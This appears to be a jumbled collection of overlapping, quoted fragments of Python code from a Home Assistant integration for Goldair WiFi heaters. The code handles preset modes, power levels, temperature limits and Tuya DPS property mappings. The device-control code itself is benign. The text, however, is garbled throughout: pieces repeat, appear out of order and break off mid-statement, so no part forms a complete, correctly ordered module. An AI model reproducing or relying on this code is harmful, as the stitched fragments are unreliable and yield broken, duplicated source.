list(PRESET_MODE_TO_DPS_MODE.keys()) def set_preset_mode(self, preset_mode): \"\"\"Set new preset mode.\"\"\" dps_mode = PRESET_MODE_TO_DPS_MODE[preset_mode]", "'display_on' ATTR_POWER_MODE = 'power_mode' ATTR_ECO_TARGET_TEMPERATURE = 'eco_' + ATTR_TARGET_TEMPERATURE STATE_COMFORT = 'Comfort' STATE_ECO", "= self.preset_mode if preset_mode == STATE_ANTI_FREEZE: raise ValueError('You cannot set the temperature in", "= self._device.get_property(self.get_property_to_dps_id[ATTR_HVAC_MODE]) if dps_mode is not None: return GoldairTuyaDevice.get_key_for_value(HVAC_MODE_TO_DPS_MODE, dps_mode) else: return STATE_UNAVAILABLE", "PROPERTY_TO_DPS_ID was: {json.dumps(self.get_property_to_dps_id)}') dps_mode = 'C' if dps_mode is not None: return GoldairTuyaDevice.get_key_for_value(PRESET_MODE_TO_DPS_MODE,", "None @property def preset_modes(self): \"\"\"Return the list of available preset modes.\"\"\" return list(PRESET_MODE_TO_DPS_MODE.keys())", "\"\"\"Return the polling state.\"\"\" return True @property def name(self): \"\"\"Return the name of", "SUPPORT_PRESET_MODE, SUPPORT_SWING_MODE ) from custom_components.goldair_climate import GoldairTuyaDevice _LOGGER = logging.getLogger(__name__) ATTR_TARGET_TEMPERATURE = 'target_temperature'", "STATE_COMFORT = 'Comfort' STATE_ECO = 'Eco' STATE_ANTI_FREEZE = 'Anti-freeze' PROPERTY_TO_DPS_ID = { ATTR_HVAC_MODE:", "new_level = swing_mode if new_level not in POWER_LEVEL_TO_DPS_LEVEL.keys(): raise ValueError(f'Invalid power level: {new_level}')", "= int(round(target_temperature)) preset_mode = self.preset_mode if preset_mode == STATE_ANTI_FREEZE: raise ValueError('You cannot set", "device.\"\"\" return self._device.name @property def temperature_unit(self): \"\"\"Return the unit of measurement.\"\"\" return self._device.temperature_unit", "ATTR_PRESET_MODE, HVAC_MODE_OFF, HVAC_MODE_HEAT, SUPPORT_TARGET_TEMPERATURE, SUPPORT_PRESET_MODE, SUPPORT_SWING_MODE ) from custom_components.goldair_climate import GoldairTuyaDevice _LOGGER =", "{ STATE_COMFORT: { 'min': 5, 'max': 37 }, STATE_ECO: { 'min': 5, 'max':", "preset mode.\"\"\" dps_mode = PRESET_MODE_TO_DPS_MODE[preset_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_PRESET_MODE], dps_mode) @property def swing_mode(self): \"\"\"Return the power", "def target_temperature_step(self): \"\"\"Return the supported step of target temperature.\"\"\" return self._TEMPERATURE_STEP @property def", "api status. Defaulting to Comfort') _LOGGER.debug(f'dps_mode was: {dps_mode}, PROPERTY_TO_DPS_ID was: {json.dumps(self.get_property_to_dps_id)}') dps_mode =", "step of target temperature.\"\"\" return self._TEMPERATURE_STEP @property def min_temp(self): \"\"\"Return the minimum temperature.\"\"\"", "dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_MODE]) if dps_mode == ATTR_POWER_MODE_USER: return self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL]) elif dps_mode == ATTR_POWER_MODE_AUTO:", "'3': '3', '4': '4', '5': '5', 'Auto': 'auto' } SUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE |", "not limits['min'] <= target_temperature <= limits['max']: raise ValueError( f'Target temperature ({target_temperature}) must be", "to Comfort') _LOGGER.debug(f'dps_mode was: {dps_mode}, PROPERTY_TO_DPS_ID was: {json.dumps(self.get_property_to_dps_id)}') dps_mode = 'C' if dps_mode", "True } PRESET_MODE_TO_DPS_MODE = { STATE_COMFORT: 'C', STATE_ECO: 'ECO', STATE_ANTI_FREEZE: 'AF' } POWER_LEVEL_TO_DPS_LEVEL", "ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' } # GOLDAIR", "dps_mode) else: return None @property def swing_modes(self): \"\"\"List of power levels.\"\"\" return list(POWER_LEVEL_TO_DPS_LEVEL.keys())", "HVAC_MODE_TO_DPS_MODE = { HVAC_MODE_OFF: False, HVAC_MODE_HEAT: True } PRESET_MODE_TO_DPS_MODE = { STATE_COMFORT: 'C',", "the power level.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_MODE]) if dps_mode == ATTR_POWER_MODE_USER: return self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL]) elif", "target_temperature <= limits['max']: raise ValueError( f'Target temperature ({target_temperature}) must be between ' f'{limits[\"min\"]}", "self._TEMPERATURE_LIMITS[self.preset_mode]['min'] else: return None @property def max_temp(self): \"\"\"Return the maximum temperature.\"\"\" if self.preset_mode", "= 'Eco' STATE_ANTI_FREEZE = 'Anti-freeze' PROPERTY_TO_DPS_ID = { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '2', ATTR_TEMPERATURE:", "'max': 37 }, STATE_ECO: { 'min': 5, 'max': 21 } } # self._model", "dps_mode) else: return None @property def preset_modes(self): \"\"\"Return the list of available preset", "(str): The device's name. device (GoldairTuyaDevice): The device API instance.\"\"\" self._device = device", "is not None: self.set_target_temperature(kwargs.get(ATTR_TEMPERATURE)) def set_target_temperature(self, target_temperature): target_temperature = int(round(target_temperature)) preset_mode = self.preset_mode", "self.set_preset_mode(kwargs.get(ATTR_PRESET_MODE)) if kwargs.get(ATTR_TEMPERATURE) is not None: self.set_target_temperature(kwargs.get(ATTR_TEMPERATURE)) def set_target_temperature(self, target_temperature): target_temperature = int(round(target_temperature))", "\"\"\"Representation of a Goldair WiFi heater.\"\"\" def __init__(self, device): \"\"\"Initialize the heater. Args:", "HVAC_MODE_OFF: False, HVAC_MODE_HEAT: True } PRESET_MODE_TO_DPS_MODE = { STATE_COMFORT: 'C', STATE_ECO: 'ECO', STATE_ANTI_FREEZE:", "self._device.model == \"GECO270\": return PROPERTY_TO_DPS_ID_GECO270 else: return PROPERTY_TO_DPS_ID @property def supported_features(self): \"\"\"Return the", "hvac_mode): \"\"\"Set new HVAC mode.\"\"\" dps_mode = HVAC_MODE_TO_DPS_MODE[hvac_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_HVAC_MODE], dps_mode) @property def preset_mode(self):", "= self._device.get_property(self.get_property_to_dps_id[ATTR_PRESET_MODE]) keys = list(self.get_property_to_dps_id) if dps_mode not in keys: _LOGGER.debug(f'Could not load", "self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['max'] else: return None def set_temperature(self, **kwargs):", "@property def swing_modes(self): \"\"\"List of power levels.\"\"\" return list(POWER_LEVEL_TO_DPS_LEVEL.keys()) def set_swing_mode(self, swing_mode): \"\"\"Set", "the heater. Args: name (str): The device's name. device (GoldairTuyaDevice): The device API", "ATTR_TARGET_TEMPERATURE STATE_COMFORT = 'Comfort' STATE_ECO = 'Eco' STATE_ANTI_FREEZE = 'Anti-freeze' PROPERTY_TO_DPS_ID = {", "homeassistant.components.climate import ClimateDevice from homeassistant.components.climate.const import ( ATTR_HVAC_MODE, ATTR_PRESET_MODE, HVAC_MODE_OFF, HVAC_MODE_HEAT, SUPPORT_TARGET_TEMPERATURE, SUPPORT_PRESET_MODE,", "maximum temperature.\"\"\" if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['max'] else: return None", "'1', ATTR_TARGET_TEMPERATURE: '3', ATTR_TEMPERATURE: '4', ATTR_PRESET_MODE: '5', ATTR_CHILD_LOCK: '2', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101',", "'Auto': 'auto' } SUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE | SUPPORT_SWING_MODE class GoldairHeater(ClimateDevice): \"\"\"Representation", "return None def set_temperature(self, **kwargs): \"\"\"Set new target temperatures.\"\"\" if kwargs.get(ATTR_PRESET_MODE) is not", "ATTR_POWER_MODE = 'power_mode' ATTR_ECO_TARGET_TEMPERATURE = 'eco_' + ATTR_TARGET_TEMPERATURE STATE_COMFORT = 'Comfort' STATE_ECO =", "37 }, STATE_ECO: { 'min': 5, 'max': 21 } } # self._model =", "import ClimateDevice from homeassistant.components.climate.const import ( ATTR_HVAC_MODE, ATTR_PRESET_MODE, HVAC_MODE_OFF, HVAC_MODE_HEAT, SUPPORT_TARGET_TEMPERATURE, SUPPORT_PRESET_MODE, SUPPORT_SWING_MODE", "<= limits['max']: raise ValueError( f'Target temperature ({target_temperature}) must be between ' f'{limits[\"min\"]} and", "def hvac_mode(self): \"\"\"Return current HVAC mode, ie Heat or Off.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_HVAC_MODE])", "elif preset_mode == STATE_ECO: self._device.set_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE], target_temperature) @property def current_temperature(self): \"\"\"Return the current temperature.\"\"\"", "name (str): The device's name. device (GoldairTuyaDevice): The device API instance.\"\"\" self._device =", "return self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL]) elif dps_mode == ATTR_POWER_MODE_AUTO: return GoldairTuyaDevice.get_key_for_value(POWER_LEVEL_TO_DPS_LEVEL, dps_mode) else: return None @property", "the supported step of target temperature.\"\"\" return self._TEMPERATURE_STEP @property def min_temp(self): \"\"\"Return the", "import ( ATTR_HVAC_MODE, ATTR_PRESET_MODE, HVAC_MODE_OFF, HVAC_MODE_HEAT, SUPPORT_TARGET_TEMPERATURE, SUPPORT_PRESET_MODE, SUPPORT_SWING_MODE ) from custom_components.goldair_climate import", "power level.\"\"\" new_level = swing_mode if new_level not in POWER_LEVEL_TO_DPS_LEVEL.keys(): raise ValueError(f'Invalid power", "temperature.\"\"\" if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['max'] else: return None def", "**kwargs): \"\"\"Set new target temperatures.\"\"\" if kwargs.get(ATTR_PRESET_MODE) is not None: self.set_preset_mode(kwargs.get(ATTR_PRESET_MODE)) if kwargs.get(ATTR_TEMPERATURE)", "\"\"\"Return the unit of measurement.\"\"\" return self._device.temperature_unit @property def target_temperature(self): \"\"\"Return the temperature", "self._device = device self._support_flags = SUPPORT_FLAGS self._TEMPERATURE_STEP = 1 self._TEMPERATURE_LIMITS = { STATE_COMFORT:", "available HVAC modes.\"\"\" return list(HVAC_MODE_TO_DPS_MODE.keys()) def set_hvac_mode(self, hvac_mode): \"\"\"Set new HVAC mode.\"\"\" dps_mode", "'106' } # GOLDAIR GECO270 PROPERTY_TO_DPS_ID_GECO270 = { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '3', ATTR_TEMPERATURE:", "\"\"\"Return the list of available preset modes.\"\"\" return list(PRESET_MODE_TO_DPS_MODE.keys()) def set_preset_mode(self, preset_mode): \"\"\"Set", "}, STATE_ECO: { 'min': 5, 'max': 21 } } # self._model = model", "= self._TEMPERATURE_LIMITS[preset_mode] if not limits['min'] <= target_temperature <= limits['max']: raise ValueError( f'Target temperature", "dps_mode = PRESET_MODE_TO_DPS_MODE[preset_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_PRESET_MODE], dps_mode) @property def swing_mode(self): \"\"\"Return the power level.\"\"\" dps_mode", "'min': 5, 'max': 21 } } # self._model = model # _LOGGER.info(f'Setting model", "heater.\"\"\" def __init__(self, device): \"\"\"Initialize the heater. Args: name (str): The device's name.", "not in keys: _LOGGER.debug(f'Could not load correct preset mode from api status. Defaulting", "({target_temperature}) must be between ' f'{limits[\"min\"]} and {limits[\"max\"]}' ) if preset_mode == STATE_COMFORT:", "set the temperature in Anti-freeze mode.') limits = self._TEMPERATURE_LIMITS[preset_mode] if not limits['min'] <=", "{json.dumps(self.get_property_to_dps_id)}') dps_mode = 'C' if dps_mode is not None: return GoldairTuyaDevice.get_key_for_value(PRESET_MODE_TO_DPS_MODE, dps_mode) else:", "\"\"\"Return the supported step of target temperature.\"\"\" return self._TEMPERATURE_STEP @property def min_temp(self): \"\"\"Return", "STATE_COMFORT: return self._device.get_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE]) elif self.preset_mode == STATE_ECO: return self._device.get_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE]) else: return None @property", "\"\"\"Return the current temperature.\"\"\" return self._device.get_property(self.get_property_to_dps_id[ATTR_TEMPERATURE]) @property def hvac_mode(self): \"\"\"Return current HVAC mode,", "the list of supported features.\"\"\" return self._support_flags @property def should_poll(self): \"\"\"Return the polling", "| SUPPORT_PRESET_MODE | SUPPORT_SWING_MODE class GoldairHeater(ClimateDevice): \"\"\"Representation of a Goldair WiFi heater.\"\"\" def", "'min': 5, 'max': 37 }, STATE_ECO: { 'min': 5, 'max': 21 } }", "'C', STATE_ECO: 'ECO', STATE_ANTI_FREEZE: 'AF' } POWER_LEVEL_TO_DPS_LEVEL = { 'Stop': 'stop', '1': '1',", "ie Comfort, Eco, Anti-freeze.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_PRESET_MODE]) keys = list(self.get_property_to_dps_id) if dps_mode not", "def name(self): \"\"\"Return the name of the climate device.\"\"\" return self._device.name @property def", "correct preset mode from api status. Defaulting to Comfort') _LOGGER.debug(f'dps_mode was: {dps_mode}, PROPERTY_TO_DPS_ID", "PROPERTY_TO_DPS_ID depending on the model of the heater you have\"\"\" if self._device.model ==", "STATE_ANTI_FREEZE: raise ValueError('You cannot set the temperature in Anti-freeze mode.') limits = self._TEMPERATURE_LIMITS[preset_mode]", "False, HVAC_MODE_HEAT: True } PRESET_MODE_TO_DPS_MODE = { STATE_COMFORT: 'C', STATE_ECO: 'ECO', STATE_ANTI_FREEZE: 'AF'", "\"\"\"Return the maximum temperature.\"\"\" if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['max'] else:", "= swing_mode if new_level not in POWER_LEVEL_TO_DPS_LEVEL.keys(): raise ValueError(f'Invalid power level: {new_level}') dps_level", "def should_poll(self): \"\"\"Return the polling state.\"\"\" return True @property def name(self): \"\"\"Return the", "target_temperature): target_temperature = int(round(target_temperature)) preset_mode = self.preset_mode if preset_mode == STATE_ANTI_FREEZE: raise ValueError('You", "The device's name. device (GoldairTuyaDevice): The device API instance.\"\"\" self._device = device self._support_flags", "if new_level not in POWER_LEVEL_TO_DPS_LEVEL.keys(): raise ValueError(f'Invalid power level: {new_level}') dps_level = POWER_LEVEL_TO_DPS_LEVEL[new_level]", ") from homeassistant.components.climate import ClimateDevice from homeassistant.components.climate.const import ( ATTR_HVAC_MODE, ATTR_PRESET_MODE, HVAC_MODE_OFF, HVAC_MODE_HEAT,", "STATE_UNAVAILABLE @property def hvac_modes(self): \"\"\"Return the list of available HVAC modes.\"\"\" return list(HVAC_MODE_TO_DPS_MODE.keys())", "to {model}') @property def get_property_to_dps_id(self): \"\"\"Get the correct PROPERTY_TO_DPS_ID depending on the model", "you have\"\"\" if self._device.model == \"GECO270\": return PROPERTY_TO_DPS_ID_GECO270 else: return PROPERTY_TO_DPS_ID @property def", "\"\"\"Return current HVAC mode, ie Heat or Off.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_HVAC_MODE]) if dps_mode", "from homeassistant.const import ( ATTR_TEMPERATURE, TEMP_CELSIUS, STATE_UNAVAILABLE ) from homeassistant.components.climate import ClimateDevice from", "} POWER_LEVEL_TO_DPS_LEVEL = { 'Stop': 'stop', '1': '1', '2': '2', '3': '3', '4':", "ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' } HVAC_MODE_TO_DPS_MODE = { HVAC_MODE_OFF: False, HVAC_MODE_HEAT:", "else: return None @property def target_temperature_step(self): \"\"\"Return the supported step of target temperature.\"\"\"", "WiFi heater.\"\"\" def __init__(self, device): \"\"\"Initialize the heater. Args: name (str): The device's", "temperature ({target_temperature}) must be between ' f'{limits[\"min\"]} and {limits[\"max\"]}' ) if preset_mode ==", "target_temperature = int(round(target_temperature)) preset_mode = self.preset_mode if preset_mode == STATE_ANTI_FREEZE: raise ValueError('You cannot", "in Anti-freeze mode.') limits = self._TEMPERATURE_LIMITS[preset_mode] if not limits['min'] <= target_temperature <= limits['max']:", "swing_mode): \"\"\"Set new power level.\"\"\" new_level = swing_mode if new_level not in POWER_LEVEL_TO_DPS_LEVEL.keys():", "ATTR_ECO_TARGET_TEMPERATURE = 'eco_' + ATTR_TARGET_TEMPERATURE STATE_COMFORT = 'Comfort' STATE_ECO = 'Eco' STATE_ANTI_FREEZE =", "\"\"\"Return the name of the climate device.\"\"\" return self._device.name @property def temperature_unit(self): \"\"\"Return", "limits['min'] <= target_temperature <= limits['max']: raise ValueError( f'Target temperature ({target_temperature}) must be between", "def temperature_unit(self): \"\"\"Return the unit of measurement.\"\"\" return self._device.temperature_unit @property def target_temperature(self): \"\"\"Return", "preset_mode == STATE_COMFORT: self._device.set_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE], target_temperature) elif preset_mode == STATE_ECO: self._device.set_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE], target_temperature) @property def", "and {limits[\"max\"]}' ) if preset_mode == STATE_COMFORT: self._device.set_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE], target_temperature) elif preset_mode == STATE_ECO:", "GoldairTuyaDevice.get_key_for_value(PRESET_MODE_TO_DPS_MODE, dps_mode) else: return None @property def preset_modes(self): \"\"\"Return the list of available", "\"\"\"List of power levels.\"\"\" return list(POWER_LEVEL_TO_DPS_LEVEL.keys()) def set_swing_mode(self, swing_mode): \"\"\"Set new power level.\"\"\"", "is not None: self.set_preset_mode(kwargs.get(ATTR_PRESET_MODE)) if kwargs.get(ATTR_TEMPERATURE) is not None: self.set_target_temperature(kwargs.get(ATTR_TEMPERATURE)) def set_target_temperature(self, target_temperature):", "_LOGGER = logging.getLogger(__name__) ATTR_TARGET_TEMPERATURE = 'target_temperature' ATTR_CHILD_LOCK = 'child_lock' ATTR_FAULT = 'fault' ATTR_POWER_MODE_AUTO", "{ 'min': 5, 'max': 21 } } # self._model = model # _LOGGER.info(f'Setting", "preset_mode(self): \"\"\"Return current preset mode, ie Comfort, Eco, Anti-freeze.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_PRESET_MODE]) keys", "ATTR_TEMPERATURE, TEMP_CELSIUS, STATE_UNAVAILABLE ) from homeassistant.components.climate import ClimateDevice from homeassistant.components.climate.const import ( ATTR_HVAC_MODE,", "set_temperature(self, **kwargs): \"\"\"Set new target temperatures.\"\"\" if kwargs.get(ATTR_PRESET_MODE) is not None: self.set_preset_mode(kwargs.get(ATTR_PRESET_MODE)) if", "@property def preset_mode(self): \"\"\"Return current preset mode, ie Comfort, Eco, Anti-freeze.\"\"\" dps_mode =", "preset mode from api status. Defaulting to Comfort') _LOGGER.debug(f'dps_mode was: {dps_mode}, PROPERTY_TO_DPS_ID was:", "mode, ie Comfort, Eco, Anti-freeze.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_PRESET_MODE]) keys = list(self.get_property_to_dps_id) if dps_mode", "'2': '2', '3': '3', '4': '4', '5': '5', 'Auto': 'auto' } SUPPORT_FLAGS =", "POWER_LEVEL_TO_DPS_LEVEL.keys(): raise ValueError(f'Invalid power level: {new_level}') dps_level = POWER_LEVEL_TO_DPS_LEVEL[new_level] self._device.set_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL], dps_level) def update(self):", "@property def get_property_to_dps_id(self): \"\"\"Get the correct PROPERTY_TO_DPS_ID depending on the model of the", "mode.\"\"\" dps_mode = PRESET_MODE_TO_DPS_MODE[preset_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_PRESET_MODE], dps_mode) @property def swing_mode(self): \"\"\"Return the power level.\"\"\"", "temperature.\"\"\" return self._device.get_property(self.get_property_to_dps_id[ATTR_TEMPERATURE]) @property def hvac_mode(self): \"\"\"Return current HVAC mode, ie Heat or", "{ STATE_COMFORT: 'C', STATE_ECO: 'ECO', STATE_ANTI_FREEZE: 'AF' } POWER_LEVEL_TO_DPS_LEVEL = { 'Stop': 'stop',", "device's name. device (GoldairTuyaDevice): The device API instance.\"\"\" self._device = device self._support_flags =", "self._device.get_property(self.get_property_to_dps_id[ATTR_TEMPERATURE]) @property def hvac_mode(self): \"\"\"Return current HVAC mode, ie Heat or Off.\"\"\" dps_mode", "'4': '4', '5': '5', 'Auto': 'auto' } SUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE |", "dps_mode) @property def swing_mode(self): \"\"\"Return the power level.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_MODE]) if dps_mode", "( ATTR_TEMPERATURE, TEMP_CELSIUS, STATE_UNAVAILABLE ) from homeassistant.components.climate import ClimateDevice from homeassistant.components.climate.const import (", "} } # self._model = model # _LOGGER.info(f'Setting model to {model}') @property def", "== STATE_ECO: self._device.set_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE], target_temperature) @property def current_temperature(self): \"\"\"Return the current temperature.\"\"\" return self._device.get_property(self.get_property_to_dps_id[ATTR_TEMPERATURE])", "STATE_COMFORT: 'C', STATE_ECO: 'ECO', STATE_ANTI_FREEZE: 'AF' } POWER_LEVEL_TO_DPS_LEVEL = { 'Stop': 'stop', '1':", "self._device.set_property(self.get_property_to_dps_id[ATTR_HVAC_MODE], dps_mode) @property def preset_mode(self): \"\"\"Return current preset mode, ie Comfort, Eco, Anti-freeze.\"\"\"", "temperature we try to reach.\"\"\" if self.preset_mode == STATE_COMFORT: return self._device.get_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE]) elif self.preset_mode", "self._device.name @property def temperature_unit(self): \"\"\"Return the unit of measurement.\"\"\" return self._device.temperature_unit @property def", "depending on the model of the heater you have\"\"\" if self._device.model == \"GECO270\":", "climate device.\"\"\" return self._device.name @property def temperature_unit(self): \"\"\"Return the unit of measurement.\"\"\" return", "Comfort') _LOGGER.debug(f'dps_mode was: {dps_mode}, PROPERTY_TO_DPS_ID was: {json.dumps(self.get_property_to_dps_id)}') dps_mode = 'C' if dps_mode is", "self.preset_mode if preset_mode == STATE_ANTI_FREEZE: raise ValueError('You cannot set the temperature in Anti-freeze", "device self._support_flags = SUPPORT_FLAGS self._TEMPERATURE_STEP = 1 self._TEMPERATURE_LIMITS = { STATE_COMFORT: { 'min':", "STATE_ECO: 'ECO', STATE_ANTI_FREEZE: 'AF' } POWER_LEVEL_TO_DPS_LEVEL = { 'Stop': 'stop', '1': '1', '2':", "a Goldair WiFi heater.\"\"\" def __init__(self, device): \"\"\"Initialize the heater. Args: name (str):", "target_temperature(self): \"\"\"Return the temperature we try to reach.\"\"\" if self.preset_mode == STATE_COMFORT: return", "if dps_mode is not None: return GoldairTuyaDevice.get_key_for_value(HVAC_MODE_TO_DPS_MODE, dps_mode) else: return STATE_UNAVAILABLE @property def", "current HVAC mode, ie Heat or Off.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_HVAC_MODE]) if dps_mode is", "power levels.\"\"\" return list(POWER_LEVEL_TO_DPS_LEVEL.keys()) def set_swing_mode(self, swing_mode): \"\"\"Set new power level.\"\"\" new_level =", "return PROPERTY_TO_DPS_ID @property def supported_features(self): \"\"\"Return the list of supported features.\"\"\" return self._support_flags", "PROPERTY_TO_DPS_ID = { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '2', ATTR_TEMPERATURE: '3', ATTR_PRESET_MODE: '4', ATTR_CHILD_LOCK: '6',", "return self._device.get_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE]) else: return None @property def target_temperature_step(self): \"\"\"Return the supported step of", "True @property def name(self): \"\"\"Return the name of the climate device.\"\"\" return self._device.name", "list(HVAC_MODE_TO_DPS_MODE.keys()) def set_hvac_mode(self, hvac_mode): \"\"\"Set new HVAC mode.\"\"\" dps_mode = HVAC_MODE_TO_DPS_MODE[hvac_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_HVAC_MODE], dps_mode)", "== ATTR_POWER_MODE_USER: return self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL]) elif dps_mode == ATTR_POWER_MODE_AUTO: return GoldairTuyaDevice.get_key_for_value(POWER_LEVEL_TO_DPS_LEVEL, dps_mode) else: return", "instance.\"\"\" self._device = device self._support_flags = SUPPORT_FLAGS self._TEMPERATURE_STEP = 1 self._TEMPERATURE_LIMITS = {", "if kwargs.get(ATTR_TEMPERATURE) is not None: self.set_target_temperature(kwargs.get(ATTR_TEMPERATURE)) def set_target_temperature(self, target_temperature): target_temperature = int(round(target_temperature)) preset_mode", "the temperature in Anti-freeze mode.') limits = self._TEMPERATURE_LIMITS[preset_mode] if not limits['min'] <= target_temperature", "temperature in Anti-freeze mode.') limits = self._TEMPERATURE_LIMITS[preset_mode] if not limits['min'] <= target_temperature <=", "try to reach.\"\"\" if self.preset_mode == STATE_COMFORT: return self._device.get_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE]) elif self.preset_mode == STATE_ECO:", "5, 'max': 37 }, STATE_ECO: { 'min': 5, 'max': 21 } } #", "\"\"\"Return the minimum temperature.\"\"\" if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['min'] else:", "of the heater you have\"\"\" if self._device.model == \"GECO270\": return PROPERTY_TO_DPS_ID_GECO270 else: return", "@property def temperature_unit(self): \"\"\"Return the unit of measurement.\"\"\" return self._device.temperature_unit @property def target_temperature(self):", "Goldair WiFi heater.\"\"\" def __init__(self, device): \"\"\"Initialize the heater. Args: name (str): The", "def set_temperature(self, **kwargs): \"\"\"Set new target temperatures.\"\"\" if kwargs.get(ATTR_PRESET_MODE) is not None: self.set_preset_mode(kwargs.get(ATTR_PRESET_MODE))", "( ATTR_HVAC_MODE, ATTR_PRESET_MODE, HVAC_MODE_OFF, HVAC_MODE_HEAT, SUPPORT_TARGET_TEMPERATURE, SUPPORT_PRESET_MODE, SUPPORT_SWING_MODE ) from custom_components.goldair_climate import GoldairTuyaDevice", "f'{limits[\"min\"]} and {limits[\"max\"]}' ) if preset_mode == STATE_COMFORT: self._device.set_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE], target_temperature) elif preset_mode ==", "current preset mode, ie Comfort, Eco, Anti-freeze.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_PRESET_MODE]) keys = list(self.get_property_to_dps_id)", "@property def swing_mode(self): \"\"\"Return the power level.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_MODE]) if dps_mode ==", "ATTR_TEMPERATURE: '4', ATTR_PRESET_MODE: '5', ATTR_CHILD_LOCK: '2', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE:", "SUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE | SUPPORT_SWING_MODE class GoldairHeater(ClimateDevice): \"\"\"Representation of a Goldair", "self.preset_mode == STATE_COMFORT: return self._device.get_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE]) elif self.preset_mode == STATE_ECO: return self._device.get_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE]) else: return", "= 'target_temperature' ATTR_CHILD_LOCK = 'child_lock' ATTR_FAULT = 'fault' ATTR_POWER_MODE_AUTO = 'auto' ATTR_POWER_MODE_USER =", "ATTR_TARGET_TEMPERATURE: '3', ATTR_TEMPERATURE: '4', ATTR_PRESET_MODE: '5', ATTR_CHILD_LOCK: '2', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON:", "in keys: _LOGGER.debug(f'Could not load correct preset mode from api status. Defaulting to", "supported features.\"\"\" return self._support_flags @property def should_poll(self): \"\"\"Return the polling state.\"\"\" return True", "HVAC_MODE_HEAT, SUPPORT_TARGET_TEMPERATURE, SUPPORT_PRESET_MODE, SUPPORT_SWING_MODE ) from custom_components.goldair_climate import GoldairTuyaDevice _LOGGER = logging.getLogger(__name__) ATTR_TARGET_TEMPERATURE", "new target temperatures.\"\"\" if kwargs.get(ATTR_PRESET_MODE) is not None: self.set_preset_mode(kwargs.get(ATTR_PRESET_MODE)) if kwargs.get(ATTR_TEMPERATURE) is not", "{model}') @property def get_property_to_dps_id(self): \"\"\"Get the correct PROPERTY_TO_DPS_ID depending on the model of", "ATTR_CHILD_LOCK: '2', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' }", "'6', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' } #", "'1': '1', '2': '2', '3': '3', '4': '4', '5': '5', 'Auto': 'auto' }", "dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_HVAC_MODE]) if dps_mode is not None: return GoldairTuyaDevice.get_key_for_value(HVAC_MODE_TO_DPS_MODE, dps_mode) else: return", "\"\"\"Return the list of available HVAC modes.\"\"\" return list(HVAC_MODE_TO_DPS_MODE.keys()) def set_hvac_mode(self, hvac_mode): \"\"\"Set", "STATE_ECO = 'Eco' STATE_ANTI_FREEZE = 'Anti-freeze' PROPERTY_TO_DPS_ID = { ATTR_HVAC_MODE: 